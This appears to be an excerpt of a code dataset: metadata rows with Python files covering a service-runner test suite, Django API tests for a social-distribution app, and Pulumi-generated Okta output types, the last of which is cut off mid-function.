| 0.059701
| 0.112328
| 0.119755
| 0.116413
| 0.908652
| 0.882473
| 0.882287
| 0.861121
| 0.853138
| 0.851281
| 0
| 0.014074
| 0.219112
| 8,644
| 275
| 89
| 31.432727
| 0.783852
| 0
| 0
| 0.737288
| 0
| 0
| 0.075659
| 0.002429
| 0
| 0
| 0
| 0
| 0.15678
| 1
| 0
| false
| 0
| 0.135593
| 0
| 0.165254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa38c80a039eda14e2aee4f80eb3dbb9dc75ab8f
| 212
|
py
|
Python
|
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
from .utils import *
from .graph_utils import *
from .math_utils import *
from .alg_utils import *
from .activations import *
from .initializers import *
from .decorators import *
from .exceptions import *
| 26.5
| 28
| 0.745283
| 27
| 212
| 5.740741
| 0.37037
| 0.451613
| 0.387097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179245
| 212
| 8
| 29
| 26.5
| 0.890805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4f7a784eb827d80938a5bbd769768dc96f9e33d
| 6,494
|
py
|
Python
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 3
|
2018-05-06T19:00:55.000Z
|
2018-06-05T09:03:34.000Z
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 10
|
2018-03-15T13:14:59.000Z
|
2021-09-21T13:26:10.000Z
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 2
|
2018-05-24T17:30:20.000Z
|
2021-09-06T22:03:31.000Z
|
from applauncher.service_runner import ProcessServiceRunner
from multiprocessing import Manager
import time
import signal
# Just a dummy process
def handler(signum, frame):
    """Signal handler installed by the dummy service; just reports it fired."""
    print("HANDLER")
def infinito():
    """Run forever (1s sleep loop), swallowing SIGTERM/SIGINT via `handler`.

    Used as a never-ending dummy service so the runner's shutdown/kill
    paths can be exercised.
    """
    try:
        for sig in (signal.SIGTERM, signal.SIGINT):
            signal.signal(sig, handler)
    except Exception as err:
        # Signal registration can fail (e.g. not in the main thread);
        # mirror the original best-effort behavior and keep looping.
        print(err)
    while True:
        time.sleep(1)
# The tests
class TestClass:
    """Lifecycle tests for ProcessServiceRunner (run / shutdown / kill / wait).

    The original stanza asserting name + liveness for each of the four
    services was copy-pasted eight times; it is factored into private
    helpers so each test reads as its intent.
    """

    # Names the four dummy services are registered under, in order.
    SERVICE_NAMES = ("A", "B", "C", "D")

    def _runner_with_services(self):
        """Return a runner with the four never-ending dummy services added."""
        r = ProcessServiceRunner()
        for service_name in self.SERVICE_NAMES:
            r.add_service(name=service_name, function=infinito)
        return r

    def _assert_all(self, r, alive):
        """Assert every registered service has the expected name and liveness."""
        assert len(r.running_services) == len(self.SERVICE_NAMES)
        for i, expected_name in enumerate(self.SERVICE_NAMES):
            name, process = r.running_services[i]
            assert name == expected_name
            assert process.is_alive() is alive

    def test_run(self):
        r = self._runner_with_services()
        # In the beginning everything is stopped
        self._assert_all(r, False)
        r.run()
        # Now everything should be running
        self._assert_all(r, True)
        r.kill()

    def test_shutdown(self):
        r = self._runner_with_services()
        # In the beginning everything is stopped
        self._assert_all(r, False)
        r.run()
        # Now everything should be running
        self._assert_all(r, True)
        r.shutdown(grace_time=2)
        time.sleep(3)
        # Now everything should be stopped
        self._assert_all(r, False)

    def test_kill(self):
        r = self._runner_with_services()
        # In the beginning everything is stopped
        self._assert_all(r, False)
        r.run()
        # Now everything should be running
        self._assert_all(r, True)
        r.kill()
        # Now everything should be stopped
        self._assert_all(r, False)

    def test_wait(self):
        """Check that we are actually waiting for the service to end"""
        r = ProcessServiceRunner()
        # Manager dict lets the child process report back to the test.
        manager = Manager()
        d = manager.dict()
        d["value"] = 0

        def wait_function(data):
            data["value"] = 1
            time.sleep(1)

        r.add_service(name="A", function=wait_function, args=(d,))
        assert d["value"] == 0
        r.run()
        assert len(r.running_services) == 1
        r.wait()
        # wait() must only return after the service has run and set the flag.
        assert d["value"] == 1

    def test_shutdown_no_grace_time(self):
        """A short grace period still terminates a non-cooperating service."""
        r = ProcessServiceRunner()
        r.add_service(name="A", function=infinito)
        assert len(r.running_services) == 1
        name, process = r.running_services[0]
        assert name == "A"
        assert process.is_alive() is False
        r.run()
        assert process.is_alive() is True
        r.shutdown(grace_time=1)
        assert process.is_alive() is False
| 33.647668
| 71
| 0.596089
| 832
| 6,494
| 4.532452
| 0.098558
| 0.080615
| 0.16123
| 0.185627
| 0.849642
| 0.849642
| 0.828958
| 0.822328
| 0.821268
| 0.821268
| 0
| 0.010303
| 0.297505
| 6,494
| 192
| 72
| 33.822917
| 0.816309
| 0.05713
| 0
| 0.810976
| 0
| 0
| 0.012115
| 0
| 0
| 0
| 0
| 0
| 0.457317
| 1
| 0.04878
| false
| 0
| 0.02439
| 0
| 0.079268
| 0.012195
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a4f820a6cbb3912a0aa4735725461971be9e975f
| 9,713
|
py
|
Python
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | 3
|
2022-03-05T03:48:23.000Z
|
2022-03-05T03:54:22.000Z
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | 2
|
2022-03-03T00:12:11.000Z
|
2022-03-04T02:44:01.000Z
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | null | null | null |
import uuid
import json
from django.test import TestCase, Client
from django.core.exceptions import ObjectDoesNotExist
from social_distribution.models import Author, Post
from .helper import create_dummy_authors, create_dummy_post, create_dummy_posts
from service.models import ServerNode
class PostViewTestCase(TestCase):
    """Tests for the single-post endpoint /service/authors/<id>/posts/<post_id>.

    The repeated author-lookup / dummy-post-creation boilerplate is factored
    into private helpers; each test method's externally visible behavior is
    unchanged.
    """

    def setUp(self):
        # The test server must be registered as the local node for the
        # service routes to accept requests from the Django test client.
        ServerNode.objects.create(host='testserver', is_local=True)
        create_dummy_authors(1)

    def _author(self):
        """Return the single dummy author created in setUp (username 'test0')."""
        return Author.objects.get(username='test0')

    def _create_post(self, author, visibility):
        """Create a plain-text dummy post for *author* and return it."""
        create_dummy_post(author, visibility=visibility, content_type='text/plain')
        return Post.objects.get(title='Test Post')

    def test_get(self):
        c = Client()
        author = self._author()
        # test with friends-only post: not visible, so 404
        post = self._create_post(author, visibility='FRIENDS')
        response = c.get(f'/service/authors/{author.id}/posts/{post.id}/')
        self.assertEqual(response.status_code, 404)
        post.delete()
        post = self._create_post(author, visibility='PUBLIC')
        # test with invalid post id
        response = c.get(f'/service/authors/{author.id}/posts/invalid_post_id')
        self.assertEqual(response.status_code, 404)
        # test with valid post id
        response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 200)
        self.assertDictEqual(response.json(), post.get_detail_dict())

    def test_head(self):
        c = Client()
        author = self._author()
        post = self._create_post(author, visibility='PUBLIC')
        # HEAD on a valid post id: success status, empty body
        response = c.head(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'')

    def test_post(self):
        c = Client()
        author = self._author()
        post = self._create_post(author, visibility='PUBLIC')
        # test without being signed in
        response = c.post(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 403)
        c.login(username=author.username, password='temporary')
        before_published = post.published
        before_modified = post.modified
        # post with valid data
        data = {
            'title': 'Updated Test Post Title',
            'description': 'Updated Test Post description',
            'content_type': 'text/plain',
            'content': 'Updated test post content',
            'categories': 'updated,test,post,categories',
            'visibility': 'PUBLIC',
        }
        response = c.post(f'/service/authors/{author.id}/posts/{post.id}', data)
        self.assertEqual(response.status_code, 200)
        post = Post.objects.get(id=post.id)  # get updated post
        # test timestamps: publish date untouched, modified bumped
        self.assertTrue(before_published == post.published)
        self.assertTrue(before_modified < post.modified)
        # test updated fields
        response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 200)
        self.assertDictEqual(response.json(), post.get_detail_dict())
        # post with invalid data
        data = {
            'title': 'Updated Test Post Title',
            'description': 'Updated Test Post description',
            'content_type': 'text/plain',
            'content': 'Updated test post content',
            # missing data
        }
        response = c.post(f'/service/authors/{author.id}/posts/{post.id}', data)
        self.assertEqual(response.status_code, 400)

    def test_delete(self):
        c = Client()
        author = self._author()
        post = self._create_post(author, visibility='PUBLIC')
        response = c.delete(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 204)
        # make sure the post is deleted from database
        with self.assertRaises(ObjectDoesNotExist):
            Post.objects.get(id=post.id)
        response = c.delete(f'/service/authors/{author.id}/posts/{post.id}/')
        self.assertEqual(response.status_code, 404, 'Retrieving deleted post should return 404')

    def test_put(self):
        c = Client()
        author = self._author()
        post_id = uuid.uuid4()
        data = {
            'title': 'Test Post',
            'description': 'Test Post description',
            'content_type': 'text/plain',
            'content': 'Test post content',
            'categories': 'test,post,categories',
            'visibility': 'PUBLIC',
        }
        # PUT to a fresh id creates the post (201)
        response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
        self.assertEqual(response.status_code, 201)
        self.assertTrue(Post.objects.filter(id=post_id, author=author).exists())
        # test whether the data is saved in db
        response = c.get(f'/service/authors/{author.id}/posts/{post_id}')
        self.assertEqual(response.status_code, 200)
        post = Post.objects.get(id=post_id, author=author)
        self.assertDictEqual(response.json(), post.get_detail_dict())
        data = {
            'title': 'Updated Test Post',
            'description': 'Updated Test Post description',
            'content_type': 'text/plain',
            'content': 'Updated Test post content',
            'categories': 'test,post,categories',
            'visibility': 'PUBLIC',
        }
        # test with non-json data
        response = c.put(f'/service/authors/{author.id}/posts/{post_id}', data)
        self.assertEqual(response.status_code, 400)
        # test update without being authenticated
        response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
        self.assertEqual(response.status_code, 403)
        # test with valid json data and authenticated user
        c.login(username=author.username, password='temporary')
        response = c.put(f'/service/authors/{author.id}/posts/{post_id}', json.dumps(data))
        self.assertEqual(response.status_code, 200)
        # test with invalid data
        data.pop('title')
        response = c.put(f'/service/authors/{author.id}/posts/{post_id}', data)
        self.assertEqual(response.status_code, 400)
        # test whether the data is saved in db
        response = c.get(f'/service/authors/{author.id}/posts/{post_id}')
        self.assertEqual(response.status_code, 200)
        post = Post.objects.get(id=post_id, author=author)
        self.assertDictEqual(response.json(), post.get_detail_dict())
class PostsViewTestCase(TestCase):
    """Tests for the post-collection endpoint /service/authors/<id>/posts.

    Shared author-lookup and bulk post creation are factored into private
    helpers; test behavior is unchanged.
    """

    def setUp(self):
        # Register the test server as the local node (see PostViewTestCase).
        ServerNode.objects.create(host='testserver', is_local=True)
        create_dummy_authors(1)

    def _author(self):
        """Return the single dummy author created in setUp (username 'test0')."""
        return Author.objects.get(username='test0')

    def _create_posts(self, author, num_public, num_friends):
        """Create the given numbers of public and friends-only dummy posts."""
        create_dummy_posts(num_public, author, visibility='PUBLIC')
        create_dummy_posts(num_friends, author, visibility='FRIENDS')

    def test_get(self):
        c = Client()
        author = self._author()
        num_public_posts = 10
        num_friends_posts = 5
        self._create_posts(author, num_public_posts, num_friends_posts)
        # Only public posts are listed: one full page of them.
        response = c.get(f'/service/authors/{author.id}/posts?page=1&size={num_public_posts}')
        self.assertEqual(response.status_code, 200)
        data = response.json()
        self.assertEqual(data['type'], 'posts')
        self.assertEqual(len(data['items']), num_public_posts)
        # test the first three posts
        posts_data = data['items'][:3]
        for post_data in posts_data:
            post_id = post_data['id'].split('/')[-1]
            post = Post.objects.get(id=post_id, author=author)
            self.assertDictEqual(post_data, post.get_detail_dict())
        # test invalid page
        response = c.get(f'/service/authors/{author.id}/posts?page=2&size={num_public_posts}')
        self.assertEqual(response.status_code, 404)

    def test_head(self):
        c = Client()
        author = self._author()
        num_public_posts = 10
        num_friends_posts = 5
        self._create_posts(author, num_public_posts, num_friends_posts)
        # HEAD returns success with an empty body.
        response = c.head(f'/service/authors/{author.id}/posts?page=1&size={num_public_posts}')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'')

    def test_post(self):
        c = Client()
        author = self._author()
        data = {
            'title': 'Test Post',
            'description': 'Test Post description',
            'content_type': 'text/plain',
            'content': 'Test post content',
            'categories': 'test,post,categories',
            'visibility': 'PUBLIC',
        }
        # test with valid data
        response = c.post(f'/service/authors/{author.id}/posts', data)
        self.assertEqual(response.status_code, 201)
        # test fields of newly created post
        post = Post.objects.get(title='Test Post', author=author)
        response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
        self.assertEqual(response.status_code, 200)
        self.assertDictEqual(response.json(), post.get_detail_dict())
        # test with invalid data: title exceeds the model's max length
        data['title'] = 'a' * 200
        response = c.post(f'/service/authors/{author.id}/posts', data)
        self.assertEqual(response.status_code, 400)
| 37.793774
| 96
| 0.632863
| 1,166
| 9,713
| 5.158662
| 0.109777
| 0.028928
| 0.095594
| 0.080299
| 0.817623
| 0.786201
| 0.781047
| 0.749293
| 0.742311
| 0.723358
| 0
| 0.013096
| 0.237414
| 9,713
| 256
| 97
| 37.941406
| 0.798974
| 0.063626
| 0
| 0.704545
| 0
| 0
| 0.23301
| 0.120366
| 0
| 0
| 0
| 0
| 0.210227
| 1
| 0.056818
| false
| 0.011364
| 0.039773
| 0
| 0.107955
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
350fc40bc329a020f52e59bb40b58f32599ef32a
| 20,004
|
py
|
Python
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2019-10-29T21:59:22.000Z
|
2021-11-08T12:00:24.000Z
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2020-01-06T10:28:09.000Z
|
2022-03-25T19:52:40.000Z
|
sdk/python/pulumi_okta/app/outputs.py
|
pulumi/pulumi-okta
|
83f7617a85b3d05213901773fa4e6a151ab6076b
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-11T16:31:04.000Z
|
2020-11-24T12:23:17.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
# Public output types re-exported by this generated module.
__all__ = [
    'AutoLoginUser',
    'BasicAuthUser',
    'BookmarkUser',
    'OAuthGroupsClaim',
    'OAuthJwk',
    'OAuthUser',
    'SamlAttributeStatement',
    'SamlUser',
    'SecurePasswordStoreUser',
    'SwaUser',
    'ThreeFieldUser',
    'UserSchemaArrayOneOf',
    'UserSchemaOneOf',
    'GetSamlAttributeStatementResult',
]
@pulumi.output_type
class AutoLoginUser(dict):
    """Output type for a user assigned to an Auto Login application.

    All fields are optional; only keys the provider returned are set on the
    underlying dict (note this is generated code — do not edit by hand).
    """
    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        return pulumi.get(self, "username")
@pulumi.output_type
class BasicAuthUser(dict):
    """Output type for a user assigned to a Basic Auth application.

    All fields are optional; only keys the provider returned are set.
    """
    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        """
        :param str id: ID of the Application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        ID of the Application.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        return pulumi.get(self, "username")
@pulumi.output_type
class BookmarkUser(dict):
    """Output type for a user assigned to a Bookmark application.

    All fields are optional; only keys the provider returned are set.
    """
    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        """
        :param str id: ID of the Application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        ID of the Application.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        return pulumi.get(self, "username")
@pulumi.output_type
class OAuthGroupsClaim(dict):
    """Groups-claim configuration output for an OAuth application."""
    @staticmethod
    def __key_warning(key: str):
        # Warn when the camelCase wire key is used for dict access instead of
        # the snake_case property getter.
        suggest = None
        if key == "filterType":
            suggest = "filter_type"

        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in OAuthGroupsClaim. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        OAuthGroupsClaim.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        OAuthGroupsClaim.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 name: str,
                 type: str,
                 value: str,
                 filter_type: Optional[str] = None):
        """
        :param str name: Name of the claim that will be used in the token.
        :param str type: Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
        :param str value: Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
        :param str filter_type: Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "type", type)
        pulumi.set(__self__, "value", value)
        if filter_type is not None:
            pulumi.set(__self__, "filter_type", filter_type)

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Name of the claim that will be used in the token.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def value(self) -> str:
        """
        Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
        """
        return pulumi.get(self, "value")

    @property
    @pulumi.getter(name="filterType")
    def filter_type(self) -> Optional[str]:
        """
        Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
        """
        return pulumi.get(self, "filter_type")
@pulumi.output_type
class OAuthJwk(dict):
    """JSON Web Key output for an OAuth application.

    ``kid`` and ``kty`` are required; ``e`` and ``n`` are optional
    (presumably the RSA public exponent and modulus — not confirmed here).
    """
    def __init__(__self__, *,
                 kid: str,
                 kty: str,
                 e: Optional[str] = None,
                 n: Optional[str] = None):
        pulumi.set(__self__, "kid", kid)
        pulumi.set(__self__, "kty", kty)
        if e is not None:
            pulumi.set(__self__, "e", e)
        if n is not None:
            pulumi.set(__self__, "n", n)

    @property
    @pulumi.getter
    def kid(self) -> str:
        return pulumi.get(self, "kid")

    @property
    @pulumi.getter
    def kty(self) -> str:
        return pulumi.get(self, "kty")

    @property
    @pulumi.getter
    def e(self) -> Optional[str]:
        return pulumi.get(self, "e")

    @property
    @pulumi.getter
    def n(self) -> Optional[str]:
        return pulumi.get(self, "n")
@pulumi.output_type
class OAuthUser(dict):
    """Output type for a user assigned to an OAuth application.

    All fields are optional; only keys the provider returned are set.
    """
    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        """
        :param str id: ID of the application.
        """
        if id is not None:
            pulumi.set(__self__, "id", id)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if scope is not None:
            pulumi.set(__self__, "scope", scope)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        ID of the application.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        return pulumi.get(self, "username")
@pulumi.output_type
class SamlAttributeStatement(dict):
    """Output type for a SAML attribute statement on an application."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys map to snake_case property getters; warn when a
        # caller indexes with the wire form.
        suggest = {"filterType": "filter_type",
                   "filterValue": "filter_value"}.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SamlAttributeStatement. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SamlAttributeStatement.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SamlAttributeStatement.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 name: str,
                 filter_type: Optional[str] = None,
                 filter_value: Optional[str] = None,
                 namespace: Optional[str] = None,
                 type: Optional[str] = None,
                 values: Optional[Sequence[str]] = None):
        """
        :param str name: The name of the attribute statement.
        :param str filter_type: Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
        :param str filter_value: Filter value to use.
        :param str namespace: The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
        :param str type: The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
        :param Sequence[str] values: Array of values to use.
        """
        # `name` is mandatory; everything else is stored only when provided.
        pulumi.set(__self__, "name", name)
        for field, value in (("filter_type", filter_type),
                             ("filter_value", filter_value),
                             ("namespace", namespace),
                             ("type", type),
                             ("values", values)):
            if value is not None:
                pulumi.set(__self__, field, value)

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        The name of the attribute statement.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="filterType")
    def filter_type(self) -> Optional[str]:
        """
        Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
        """
        return pulumi.get(self, "filter_type")

    @property
    @pulumi.getter(name="filterValue")
    def filter_value(self) -> Optional[str]:
        """
        Filter value to use.
        """
        return pulumi.get(self, "filter_value")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """
        The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def values(self) -> Optional[Sequence[str]]:
        """
        Array of values to use.
        """
        return pulumi.get(self, "values")
@pulumi.output_type
class SamlUser(dict):
    """Output type describing a user attached to a SAML application."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        """
        :param str id: id of application.
        """
        # Insertion order of this dict fixes the order of the set calls.
        candidates = {"id": id,
                      "password": password,
                      "scope": scope,
                      "username": username}
        for key, value in candidates.items():
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """
        id of application.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        """Return the stored ``password`` value, if any."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        """Return the stored ``scope`` value, if any."""
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        """Return the stored ``username`` value, if any."""
        return pulumi.get(self, "username")
@pulumi.output_type
class SecurePasswordStoreUser(dict):
    """Output type describing a user attached to a secure-password-store app."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        keys = ("id", "password", "scope", "username")
        # Skip anything the caller left unset.
        for key, value in zip(keys, (id, password, scope, username)):
            if value is not None:
                pulumi.set(__self__, key, value)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """Return the stored ``id`` value, if any."""
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        """Return the stored ``password`` value, if any."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        """Return the stored ``scope`` value, if any."""
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        """Return the stored ``username`` value, if any."""
        return pulumi.get(self, "username")
@pulumi.output_type
class SwaUser(dict):
    """Output type describing a user attached to a SWA application."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        # Record only the attributes that were actually supplied.
        for attr_name, attr_value in (("id", id),
                                      ("password", password),
                                      ("scope", scope),
                                      ("username", username)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def id(self) -> Optional[str]:
        """Return the stored ``id`` value, if any."""
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def password(self) -> Optional[str]:
        """Return the stored ``password`` value, if any."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def scope(self) -> Optional[str]:
        """Return the stored ``scope`` value, if any."""
        return pulumi.get(self, "scope")

    @property
    @pulumi.getter
    def username(self) -> Optional[str]:
        """Return the stored ``username`` value, if any."""
        return pulumi.get(self, "username")
@pulumi.output_type
class ThreeFieldUser(dict):
    """Output type describing a user attached to a three-field application."""

    def __init__(__self__, *,
                 id: Optional[str] = None,
                 password: Optional[str] = None,
                 scope: Optional[str] = None,
                 username: Optional[str] = None):
        # Filter out unset fields first, then persist the remainder in order.
        present = {k: v
                   for k, v in (("id", id),
                                ("password", password),
                                ("scope", scope),
                                ("username", username))
                   if v is not None}
        for key, value in present.items():
